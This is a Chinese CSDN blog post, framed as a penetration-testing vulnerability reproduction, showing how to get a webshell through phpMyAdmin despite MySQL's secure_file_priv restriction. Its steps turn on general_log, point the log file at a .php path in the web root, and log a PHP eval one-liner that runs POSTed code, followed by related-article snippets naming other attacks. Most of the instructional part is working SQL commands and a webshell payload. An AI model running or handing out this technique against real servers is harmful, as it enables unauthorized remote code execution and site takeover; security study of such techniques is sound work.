phpMyAdmin突破secure-file-priv写WebShell

最新推荐文章于 2023-09-19 15:35:42 发布
最新推荐文章于 2023-09-19 15:35:42 发布
阅读量829 收藏 1
点赞数
分类专栏: security 渗透测试 文章标签: phpMyAdmin 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37622608/article/details/109812263
版权

欢迎到我的博客查看原文

1.查看secure_file_priv

show global variables like '%secure_file_priv%';
# show global variables like '%secure%';

# 此开关默认为NULL:即不允许导入导出
# 没有具体值时:表示不对mysqld 的导入|导出做限制
# 值为/tmp/ :表示限制mysqld 的导入|导出只能发生在/tmp/目录下

2.查询操作日志存放路径

show variables like 'general_log%';

# 操作日志默认也是关闭的

3.首先打开操作日志记录

set global general_log = 'ON';

4.设置操作记录日志路径(前提是获取到了绝对路径)

# set global general_log_file='路径地址';
# 选择网站的目录里面
set global general_log_file='D:\\phpstudy\\PHPTutorial\\WWW\\xx.php'

5.执行sql语句,mysql会将执行的语句内容记录到我们指定的文件中,就可以getshell了

select '<?php @eval($_POST[1]);?>';

6.访问webshell,进行后续操作…

www.xpshuai.cn
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin 怎么导出 表中指定条件的数据_phpMyAdmin后台Getshell总结
weixin_39581995的博客
12-08 851
0x01 前言phpMyAdmin是一个以PHP为基础的MySQL数据库管理工具,管理者可以通过Web方式来控制和操作MySQL数据库。phpMyAdmin在MySQL和MariaDB上支持多种操作,可以直接在用户界面中执行常用操作,如:浏览/删除/创建/复制/删除/重命名和更改数据库、表、视图、字段和索引,管理MySQL用户帐户和权限等,也可以直接执行SQL语句。0x02 Getshe...
phpmyadmin突破secure_file_privshell 的渗透
qq_45906009的博客
06-22 541
有一天在公司,突然想起来自己有一个靶机没有复现漏洞,须视乎,搞一下子 首先通过VMware,我将虚拟机安装了。 上面是这台虚拟机的IP地址,二话不说拿7kb扫一下网站。 我们发现这个网站有一个phpmyadmin,二话不说试一下默认密码root/root 果然登录成功了 既然是root权限 那我们不上传shell 自己都看不下去 上次webshell需要有俩个条件 有读的权限 知道文件的绝对路径(这里我们知道 文件的绝对路径是什么 因为靶机在手 哈哈哈 ) 我们选择mysql数据库 看一下
phpMyAdmin-5.0.4-all-languages.zip
10-30
phpMyAdmin-5.0.4-all-languages.zip搬运,因为某些原因,此网站墙了,所以放出来供需要的朋友下载
phpmyadmin页面getshell
qq_52469895的博客
04-10 2355
来到phpmyadmin页面后如何getshell呢?下面介绍两种方法 0x01 select into outfile直接入 1、利用条件 对web目录需要有权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secure_file_priv值 show global variables like '%secure%'; 关于secure_file_
php admin_priv,一次phpmyadmin突破secure_file_privshell 的渗透
weixin_39664560的博客
03-13 202
晚上下闲来无事,租的公寓一共两间房,我和另外一个同学各住一间,隔壁一墙之隔的他正在打游戏,我比较爱学习,随便玩玩,就突然引发了一次简单渗透。。。 无关紧要的过程就不了,下面简单记录下主要有用的步骤。首先nmap扫描内网发现发现内网里面存活的主机,不多,简单排除下,估计192.168.1.101就是隔壁室友的电脑了,发现80、3306端口图片.png访问下80,如下图,最近在做毕业设计,很明显这是...
phpMyAdmin getshell总结
zzgslh的博客
04-14 709
phpMyAdmin getshell总结 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。 一、phpMyAdmin权限(into outfile)getshell 利用条件 1.知道网站绝对路径 2.对web目录具有入权限 3.secure_ file_ priv没有具体值 ...
Mysqlwebshell两种方法总结-- into outfile,导入日志
qq_45730325的博客
05-19 3449
Mysqlwebshell
web渗透【11】phpmyadminshell的三种方法
司徒荆的博客
05-30 5719
查看phpMyAdmin能否自定义导出文件目录的权限
phpMyadmin】MYSQL突破secure_file_privshell提权
最新发布
失心少年
09-19 844
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
phpmyadmin mysql提权_phpMyadmin提权那些事
weixin_34603814的博客
01-20 171
phpMyadmin提权那些事引言:在渗透测试过程中获知到phpMyadmin的账号密码,如何进行提权呢?往下看,我今天和你说说phpMyadmin提权那些事。0x00 定义​ phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。0x01 环境准备目标: Windows Serve...
phpMyAdmin-5.2.0-all-languages.zip
08-01
phpMyAdmin-5.2.0-all-languages.zip
phpMyAdmin-4.4.5-all-languages.zip
12-29
phpMyAdmin 是一个用PHP编的,可以通过互联网控制和操作MySQL。通过phpMyAdmin可以完全对数据库进行操作,例如建立、复制/删除数据等等。
phpMyAdmin-4.9.2-all-languages.tar.gz
06-17
phpMyAdmin-4.9.2-all-languages.tar.gz, 中文版本。在项目目录直接解压即可,可以使用root来登录。用来管理数据库,如mysql,mariadb等
phpMyAdmin-5.1.1-all-languages.zip
06-22
Many operating systems already include a phpMyAdmin package and will automatically keep it updated, however these versions are sometimes slightly outdated and therefore may be missing the latest ...
Hadoop未授权访问漏洞
可爱的我可爱的code
11-19 4687
漏洞简介以及危害 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器器直接在开放了了 Hadoop 机器器 HDFS 的 50070 web 端口及部分默认服务口口,黑客可以通过命令行操作多个目录下 的数据,如进行删除,下载,目录浏览甚至命令行行等操作,产生极大的危害。 环境 vulnhub 测试 启动环境 docker-compose up -d 访问 http://192.168.0.100:8088/cluster 通过REST API命令执行 利用过程: 在本地监听端
Tomcat常见漏洞复现
可爱的我可爱的code
11-20 2753
欢迎到我的小博客站光顾:www.xpshuai.cn 后台管理页面弱口令 默认:http://127.0.0.1:8080/manager/html页面只允许本地访问,除非管理员手工修改了这些属性 1.尝试登录后台 1.尝试默认账户密码:tomcat:tomcat 2.如果不是,尝试用弱口令字典进行爆破 # hydra爆破manager后台 hydra -L user.txt -P user.txt -f 10.10.10.81 -s 8080 http-get /manager/html 2.部署w.
安装kali之后必做的几件小事
可爱的我可爱的code
03-01 2504
开始22端口 先修改 配置文件 /etc/ssd/sshd_config 参考博客 https://blog.csdn.net/qq_37458055/article/details/75205282 启动SSH服务命令为: /etc/init.d/ssh start 或者 service ssh start 查看SSH服务状态是否正常运行,命令为: /etc/init.d/ssh stat...
Shiro rememberMe反序列化漏洞(Shiro-550)复现
可爱的我可爱的code
11-19 2436
欢迎到我的博客查看原文:http://www.xpshuai.cn/posts/40239/ 漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。 Payload产生的过程: 命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值 在整个漏洞利用过.
Jenkins一些安全问题
可爱的我可爱的code
11-19 1215
欢迎大家到我的博客查看:http://www.xpshuai.cn 漏洞简介及危害 默认情况下 Jenkins面面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行行界面从而获取服务器权限。 环境搭建 # 下载地址: https://www.jenkins.io/download/ # 可以直接下载war包 java -jar jenkins.war # 运行 # wget http://mirrors.jenkins.
docker-compose V3 部署mysql+phpmyadmin
07-17
要使用Docker Compose v3部署MySQL和phpMyAdmin,可以照以下步骤进行操作: 1.先,创建一个名为`docker-compose.yml的文件,并在其中添加以下内容: ```yaml version: '3' services: db: image: mysql:latest restart: always environment: MYSQL_ROOT_PASSWORD: your_mysql_root_password MYSQL_DATABASE: your_mysql_database MYSQL_USER: your_mysql_user MYSQL_PASSWORD: your_mysql_password phpmyadmin: image: phpmyadmin/phpmyadmin restart: always links: - db:db ports: - 8080:80 ``` 请替换`your_mysql_root_password`,`your_mysql_database`,`your_mysql_user`和`your_mysql_password`为您自己的MySQL配置信息。 2. 保存并关闭`docker-compose.yml`文件。 3. 在终端或命令提示符中,导航到包含`docker-compose.yml`文件的目录。 4. 运行以下命令以启动MySQL和phpMyAdmin容器: ``` docker-compose up -d ``` `-d`标志将使容器在后台运行。 5. 等待一段时间,直到容器启动并完成初始化。 6. 现在,您可以通过在浏览器中访问http://localhost:8080 来访问phpMyAdmin。如果您在远程服务器上安装了Docker,则需要替换"localhost"为服务器的IP地址。 请注意,上述配置中的MySQL容器将使用最新版本的MySQL镜像,并且phpMyAdmin容器将使用最新版本的phpMyAdmin镜像。您可以根据需要更改这些镜像的版本。 希望这可以帮助您成功部署MySQL和phpMyAdmin!如果有任何问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值